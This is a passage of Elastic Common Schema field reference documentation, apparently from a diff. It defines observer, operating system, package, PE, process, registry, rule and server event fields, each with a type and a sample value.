+*`observer.egress.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`observer.egress.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +*`observer.egress.zone`*:: ++ +-- +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. + +type: keyword + +example: Public_Internet + +-- + +*`observer.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`observer.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`observer.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`observer.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`observer.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`observer.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`observer.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`observer.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`observer.hostname`*:: ++ +-- +Hostname of the observer. + +type: keyword + +-- + +*`observer.ingress`*:: ++ +-- +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. + +type: object + +-- + +*`observer.ingress.interface.alias`*:: ++ +-- +Interface alias as reported by the system, typically used in firewall implementations for e.g. inside, outside, or dmz logical interface naming. + +type: keyword + +example: outside + +-- + +*`observer.ingress.interface.id`*:: ++ +-- +Interface ID as reported by an observer (typically SNMP interface ID). + +type: keyword + +example: 10 + +-- + +*`observer.ingress.interface.name`*:: ++ +-- +Interface name as reported by the system. + +type: keyword + +example: eth0 + +-- + +*`observer.ingress.vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`observer.ingress.vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +*`observer.ingress.zone`*:: ++ +-- +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. + +type: keyword + +example: DMZ + +-- + +*`observer.ip`*:: ++ +-- +IP addresses of the observer. + +type: ip + +-- + +*`observer.mac`*:: ++ +-- +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + +-- + +*`observer.name`*:: ++ +-- +Custom name of the observer. +This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. +If no custom name is needed, the field can be left empty. + +type: keyword + +example: 1_proxySG + +-- + +*`observer.os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). + +type: keyword + +example: debian + +-- + +*`observer.os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`observer.os.full.text`*:: ++ +-- +type: text + +-- + +*`observer.os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`observer.os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`observer.os.name.text`*:: ++ +-- +type: text + +-- + +*`observer.os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`observer.os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +*`observer.product`*:: ++ +-- +The product name of the observer. + +type: keyword + +example: s200 + +-- + +*`observer.serial_number`*:: ++ +-- +Observer serial number. + +type: keyword + +-- + +*`observer.type`*:: ++ +-- +The type of the observer the data is coming from. +There is no predefined list of observer types. Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. + +type: keyword + +example: firewall + +-- + +*`observer.vendor`*:: ++ +-- +Vendor name of the observer. + +type: keyword + +example: Symantec + +-- + +*`observer.version`*:: ++ +-- +Observer version. + +type: keyword + +-- + +[float] +=== organization + +The organization fields enrich data with information about the company or entity the data is associated with. +These fields help you arrange or filter data stored in an index by one or multiple organizations. + + +*`organization.id`*:: ++ +-- +Unique identifier for the organization. + +type: keyword + +-- + +*`organization.name`*:: ++ +-- +Organization name. + +type: keyword + +-- + +*`organization.name.text`*:: ++ +-- +type: text + +-- + +[float] +=== os + +The OS fields contain information about the operating system. + + +*`os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). + +type: keyword + +example: debian + +-- + +*`os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`os.full.text`*:: ++ +-- +type: text + +-- + +*`os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`os.name.text`*:: ++ +-- +type: text + +-- + +*`os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +[float] +=== package + +These fields contain information about an installed software package. It contains general information about a package, such as name, version or size. It also contains installation details, such as time or location. + + +*`package.architecture`*:: ++ +-- +Package architecture. + +type: keyword + +example: x86_64 + +-- + +*`package.build_version`*:: ++ +-- +Additional information about the build version of the installed package. +For example use the commit SHA of a non-released package. + +type: keyword + +example: 36f4f7e89dd61b0988b12ee000b98966867710cd + +-- + +*`package.checksum`*:: ++ +-- +Checksum of the installed package for verification. + +type: keyword + +example: 68b329da9893e34099c7d8ad5cb9c940 + +-- + +*`package.description`*:: ++ +-- +Description of the package. + +type: keyword + +example: Open source programming language to build simple/reliable/efficient software. + +-- + +*`package.install_scope`*:: ++ +-- +Indicating how the package was installed, e.g. user-local, global. + +type: keyword + +example: global + +-- + +*`package.installed`*:: ++ +-- +Time when package was installed. + +type: date + +-- + +*`package.license`*:: ++ +-- +License under which the package was released. +Use a short name, e.g. the license identifier from SPDX License List where possible (https://spdx.org/licenses/). + +type: keyword + +example: Apache License 2.0 + +-- + +*`package.name`*:: ++ +-- +Package name + +type: keyword + +example: go + +-- + +*`package.path`*:: ++ +-- +Path where the package is installed. + +type: keyword + +example: /usr/local/Cellar/go/1.12.9/ + +-- + +*`package.reference`*:: ++ +-- +Home page or reference URL of the software in this package, if available. + +type: keyword + +example: https://golang.org + +-- + +*`package.size`*:: ++ +-- +Package size in bytes. + +type: long + +example: 62231 + +format: string + +-- + +*`package.type`*:: ++ +-- +Type of package. +This should contain the package file type, rather than the package manager name. Examples: rpm, dpkg, brew, npm, gem, nupkg, jar. + +type: keyword + +example: rpm + +-- + +*`package.version`*:: ++ +-- +Package version + +type: keyword + +example: 1.12.9 + +-- + +[float] +=== pe + +These fields contain Windows Portable Executable (PE) metadata. + + +*`pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +[float] +=== process + +These fields contain information about a process. +These fields can help you correlate metrics information with a process id/name from a log message. The `process.pid` often stays in the metric itself and is copied to the global field for correlation. + + +*`process.args`*:: ++ +-- +Array of process arguments, starting with the absolute path to the executable. +May be filtered to protect sensitive information. + +type: keyword + +example: ["/usr/bin/ssh", "-l", "user", "10.0.0.16"] + +-- + +*`process.args_count`*:: ++ +-- +Length of the process.args array. +This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. + +type: long + +example: 4 + +-- + +*`process.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`process.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`process.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`process.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`process.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`process.command_line`*:: ++ +-- +Full command line that started the process, including the absolute path to the executable, and all arguments. +Some arguments may be filtered to protect sensitive information. + +type: keyword + +example: /usr/bin/ssh -l user 10.0.0.16 + +-- + +*`process.command_line.text`*:: ++ +-- +type: text + +-- + +*`process.entity_id`*:: ++ +-- +Unique identifier for the process. +The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. +Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. + +type: keyword + +example: c2c455d9f99375d + +-- + +*`process.executable`*:: ++ +-- +Absolute path to the process executable. + +type: keyword + +example: /usr/bin/ssh + +-- + +*`process.executable.text`*:: ++ +-- +type: text + +-- + +*`process.exit_code`*:: ++ +-- +The exit code of the process, if this is a termination event. +The field should be absent if there is no exit code for the event (e.g. process start). + +type: long + +example: 137 + +-- + +*`process.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`process.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`process.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`process.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`process.name`*:: ++ +-- +Process name. +Sometimes called program name or similar. + +type: keyword + +example: ssh + +-- + +*`process.name.text`*:: ++ +-- +type: text + +-- + +*`process.parent.args`*:: ++ +-- +Array of process arguments, starting with the absolute path to the executable. +May be filtered to protect sensitive information. + +type: keyword + +example: ["/usr/bin/ssh", "-l", "user", "10.0.0.16"] + +-- + +*`process.parent.args_count`*:: ++ +-- +Length of the process.args array. +This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. + +type: long + +example: 4 + +-- + +*`process.parent.code_signature.exists`*:: ++ +-- +Boolean to capture if a signature is present. + +type: boolean + +example: true + +-- + +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + +*`process.parent.code_signature.status`*:: ++ +-- +Additional information about the certificate status. +This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. + +type: keyword + +example: ERROR_UNTRUSTED_ROOT + +-- + +*`process.parent.code_signature.subject_name`*:: ++ +-- +Subject name of the code signer + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + +*`process.parent.code_signature.trusted`*:: ++ +-- +Stores the trust status of the certificate chain. +Validating the trust of the certificate chain may be complicated, and this field should only be populated by tools that actively check the status. + +type: boolean + +example: true + +-- + +*`process.parent.code_signature.valid`*:: ++ +-- +Boolean to capture if the digital signature is verified against the binary content. +Leave unpopulated if a certificate was unchecked. + +type: boolean + +example: true + +-- + +*`process.parent.command_line`*:: ++ +-- +Full command line that started the process, including the absolute path to the executable, and all arguments. +Some arguments may be filtered to protect sensitive information. + +type: keyword + +example: /usr/bin/ssh -l user 10.0.0.16 + +-- + +*`process.parent.command_line.text`*:: ++ +-- +type: text + +-- + +*`process.parent.entity_id`*:: ++ +-- +Unique identifier for the process. +The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. +Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. + +type: keyword + +example: c2c455d9f99375d + +-- + +*`process.parent.executable`*:: ++ +-- +Absolute path to the process executable. + +type: keyword + +example: /usr/bin/ssh + +-- + +*`process.parent.executable.text`*:: ++ +-- +type: text + +-- + +*`process.parent.exit_code`*:: ++ +-- +The exit code of the process, if this is a termination event. +The field should be absent if there is no exit code for the event (e.g. process start). + +type: long + +example: 137 + +-- + +*`process.parent.hash.md5`*:: ++ +-- +MD5 hash. + +type: keyword + +-- + +*`process.parent.hash.sha1`*:: ++ +-- +SHA1 hash. + +type: keyword + +-- + +*`process.parent.hash.sha256`*:: ++ +-- +SHA256 hash. + +type: keyword + +-- + +*`process.parent.hash.sha512`*:: ++ +-- +SHA512 hash. + +type: keyword + +-- + +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + +*`process.parent.name`*:: ++ +-- +Process name. +Sometimes called program name or similar. + +type: keyword + +example: ssh + +-- + +*`process.parent.name.text`*:: ++ +-- +type: text + +-- + +*`process.parent.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`process.parent.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.parent.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`process.parent.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`process.parent.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`process.parent.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`process.parent.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +*`process.parent.pgid`*:: ++ +-- +Identifier of the group of processes the process belongs to. + +type: long + +format: string + +-- + +*`process.parent.pid`*:: ++ +-- +Process id. + +type: long + +example: 4242 + +format: string + +-- + +*`process.parent.ppid`*:: ++ +-- +Parent process' pid. + +type: long + +example: 4241 + +format: string + +-- + +*`process.parent.start`*:: ++ +-- +The time the process started. + +type: date + +example: 2016-05-23T08:05:34.853Z + +-- + +*`process.parent.thread.id`*:: ++ +-- +Thread ID. + +type: long + +example: 4242 + +format: string + +-- + +*`process.parent.thread.name`*:: ++ +-- +Thread name. + +type: keyword + +example: thread-0 + +-- + +*`process.parent.title`*:: ++ +-- +Process title. +The proctitle, some times the same as process name. Can also be different: for example a browser setting its title to the web page currently opened. + +type: keyword + +-- + +*`process.parent.title.text`*:: ++ +-- +type: text + +-- + +*`process.parent.uptime`*:: ++ +-- +Seconds the process has been up. + +type: long + +example: 1325 + +-- + +*`process.parent.working_directory`*:: ++ +-- +The working directory of the process. + +type: keyword + +example: /home/alice + +-- + +*`process.parent.working_directory.text`*:: ++ +-- +type: text + +-- + +*`process.pe.architecture`*:: ++ +-- +CPU architecture target for the file. + +type: keyword + +example: x64 + +-- + +*`process.pe.company`*:: ++ +-- +Internal company name of the file, provided at compile-time. + +type: keyword + +example: Microsoft Corporation + +-- + +*`process.pe.description`*:: ++ +-- +Internal description of the file, provided at compile-time. + +type: keyword + +example: Paint + +-- + +*`process.pe.file_version`*:: ++ +-- +Internal version of the file, provided at compile-time. + +type: keyword + +example: 6.3.9600.17415 + +-- + +*`process.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. +Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + +*`process.pe.original_file_name`*:: ++ +-- +Internal name of the file, provided at compile-time. + +type: keyword + +example: MSPAINT.EXE + +-- + +*`process.pe.product`*:: ++ +-- +Internal product name of the file, provided at compile-time. + +type: keyword + +example: Microsoft® Windows® Operating System + +-- + +*`process.pgid`*:: ++ +-- +Identifier of the group of processes the process belongs to. + +type: long + +format: string + +-- + +*`process.pid`*:: ++ +-- +Process id. + +type: long + +example: 4242 + +format: string + +-- + +*`process.ppid`*:: ++ +-- +Parent process' pid. + +type: long + +example: 4241 + +format: string + +-- + +*`process.start`*:: ++ +-- +The time the process started. + +type: date + +example: 2016-05-23T08:05:34.853Z + +-- + +*`process.thread.id`*:: ++ +-- +Thread ID. + +type: long + +example: 4242 + +format: string + +-- + +*`process.thread.name`*:: ++ +-- +Thread name. + +type: keyword + +example: thread-0 + +-- + +*`process.title`*:: ++ +-- +Process title. +The proctitle, some times the same as process name. Can also be different: for example a browser setting its title to the web page currently opened. + +type: keyword + +-- + +*`process.title.text`*:: ++ +-- +type: text + +-- + +*`process.uptime`*:: ++ +-- +Seconds the process has been up. + +type: long + +example: 1325 + +-- + +*`process.working_directory`*:: ++ +-- +The working directory of the process. + +type: keyword + +example: /home/alice + +-- + +*`process.working_directory.text`*:: ++ +-- +type: text + +-- + +[float] +=== registry + +Fields related to Windows Registry operations. + + +*`registry.data.bytes`*:: ++ +-- +Original bytes written with base64 encoding. +For Windows registry operations, such as SetValueEx and RegQueryValueEx, this corresponds to the data pointed by `lp_data`. This is optional but provides better recoverability and should be populated for REG_BINARY encoded values. + +type: keyword + +example: ZQBuAC0AVQBTAAAAZQBuAAAAAAA= + +-- + +*`registry.data.strings`*:: ++ +-- +Content when writing string types. +Populated as an array when writing string data to the registry. For single string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with one string. For sequences of string with REG_MULTI_SZ, this array will be variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should be populated with the decimal representation (e.g `"1"`). + +type: keyword + +example: ["C:\rta\red_ttp\bin\myapp.exe"] + +-- + +*`registry.data.type`*:: ++ +-- +Standard registry type for encoding contents + +type: keyword + +example: REG_SZ + +-- + +*`registry.hive`*:: ++ +-- +Abbreviated name for the hive. + +type: keyword + +example: HKLM + +-- + +*`registry.key`*:: ++ +-- +Hive-relative path of keys. + +type: keyword + +example: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe + +-- + +*`registry.path`*:: ++ +-- +Full path, including hive, key and value + +type: keyword + +example: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe\Debugger + +-- + +*`registry.value`*:: ++ +-- +Name of the value written. + +type: keyword + +example: Debugger + +-- + +[float] +=== related + +This field set is meant to facilitate pivoting around a piece of data. +Some pieces of information can be seen in many places in an ECS event. To facilitate searching for them, store an array of all seen values to their corresponding field in `related.`. +A concrete example is IP addresses, which can be under host, observer, source, destination, client, server, and network.forwarded_ip. If you append all IPs to `related.ip`, you can then search for a given IP trivially, no matter where it appeared, by querying `related.ip:192.0.2.15`. + + +*`related.hash`*:: ++ +-- +All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). + +type: keyword + +-- + +*`related.hosts`*:: ++ +-- +All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. + +type: keyword + +-- + +*`related.ip`*:: ++ +-- +All of the IPs seen on your event. + +type: ip + +-- + +*`related.user`*:: ++ +-- +All the user names seen on your event. + +type: keyword + +-- + +[float] +=== rule + +Rule fields are used to capture the specifics of any observer or agent rules that generate alerts or other notable events. +Examples of data sources that would populate the rule fields include: network admission control platforms, network or host IDS/IPS, network firewalls, web application firewalls, url filters, endpoint detection and response (EDR) systems, etc. + + +*`rule.author`*:: ++ +-- +Name, organization, or pseudonym of the author or authors who created the rule used to generate this event. + +type: keyword + +example: ["Star-Lord"] + +-- + +*`rule.category`*:: ++ +-- +A categorization value keyword used by the entity using the rule for detection of this event. + +type: keyword + +example: Attempted Information Leak + +-- + +*`rule.description`*:: ++ +-- +The description of the rule generating the event. + +type: keyword + +example: Block requests to public DNS over HTTPS / TLS protocols + +-- + +*`rule.id`*:: ++ +-- +A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. + +type: keyword + +example: 101 + +-- + +*`rule.license`*:: ++ +-- +Name of the license under which the rule used to generate this event is made available. + +type: keyword + +example: Apache 2.0 + +-- + +*`rule.name`*:: ++ +-- +The name of the rule or signature generating the event. + +type: keyword + +example: BLOCK_DNS_over_TLS + +-- + +*`rule.reference`*:: ++ +-- +Reference URL to additional information about the rule used to generate this event. +The URL can point to the vendor's documentation about the rule. If that's not available, it can also be a link to a more general page describing this type of alert. + +type: keyword + +example: https://en.wikipedia.org/wiki/DNS_over_TLS + +-- + +*`rule.ruleset`*:: ++ +-- +Name of the ruleset, policy, group, or parent category in which the rule used to generate this event is a member. + +type: keyword + +example: Standard_Protocol_Filters + +-- + +*`rule.uuid`*:: ++ +-- +A rule ID that is unique within the scope of a set or group of agents, observers, or other entities using the rule for detection of this event. + +type: keyword + +example: 1100110011 + +-- + +*`rule.version`*:: ++ +-- +The version / revision of the rule being used for analysis. + +type: keyword + +example: 1.1 + +-- + +[float] +=== server + +A Server is defined as the responder in a network connection for events regarding sessions, connections, or bidirectional flow records. +For TCP events, the server is the receiver of the initial SYN packet(s) of the TCP connection. For other protocols, the server is generally the responder in the network transaction. Some systems actually use the term "responder" to refer the server in TCP connections. The server fields describe details about the system acting as the server in the network event. Server fields are usually populated in conjunction with client fields. Server fields are generally not populated for packet-level events. +Client / server representations can add semantic context to an exchange, which is helpful to visualize the data in certain situations. If your context falls in that category, you should still ensure that source and destination are filled appropriately. + + +*`server.address`*:: ++ +-- +Some event server addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. +Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`server.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`server.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`server.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`server.bytes`*:: ++ +-- +Bytes sent from the server to the client. + +type: long + +example: 184 + +format: bytes + +-- + +*`server.domain`*:: ++ +-- +Server domain. + +type: keyword + +-- + +*`server.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`server.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`server.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`server.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`server.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`server.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`server.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`server.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`server.ip`*:: ++ +-- +IP address of the server (IPv4 or IPv6). + +type: ip + +-- + +*`server.mac`*:: ++ +-- +MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`server.nat.ip`*:: ++ +-- +Translated ip of destination based NAT sessions (e.g. internet to private DMZ) +Typically used with load balancers, firewalls, or routers. + +type: ip + +-- + +*`server.nat.port`*:: ++ +-- +Translated port of destination based NAT sessions (e.g. internet to private DMZ) +Typically used with load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`server.packets`*:: ++ +-- +Packets sent from the server to the client. + +type: long + +example: 12 + +-- + +*`server.port`*:: ++ +-- +Port of the server. + +type: long + +format: string + +-- + +*`server.registered_domain`*:: ++ +-- +The highest registered server domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`server.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`server.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`server.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`server.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`server.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`server.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`server.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`server.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`server.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`server.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`server.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`server.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`server.user.name.text`*:: ++ +-- +type: text + +-- + +*`server.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: 